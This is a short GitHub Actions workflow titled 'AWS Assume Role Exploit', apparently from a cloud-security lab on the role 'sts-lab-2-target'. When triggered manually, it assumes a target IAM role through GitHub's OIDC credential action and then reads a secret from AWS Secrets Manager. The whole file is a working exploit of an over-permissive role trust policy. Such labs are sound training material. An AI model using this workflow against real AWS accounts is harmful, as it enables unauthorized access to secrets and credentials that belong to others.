name: AWS Assume Role Exploit

on:
  workflow_dispatch:  # Allows manual triggering of the workflow

jobs:
  assume-role:
    runs-on: ubuntu-latest
    steps:
    - name: Configure AWS credentials
      id: aws-credentials
      uses: aws-actions/configure-aws-credentials@v2
      with:
        role-to-assume: arn:aws:iam::683350395763:role/sts-lab-2-target  # The target role ARN
        aws-region: us-east-1  # The AWS region where your secret is located

    - name: Read Secret from AWS Secrets Manager
      run: aws secretsmanager get-secret-value --secret-id <YourSecretID> --query 'SecretString' --output text
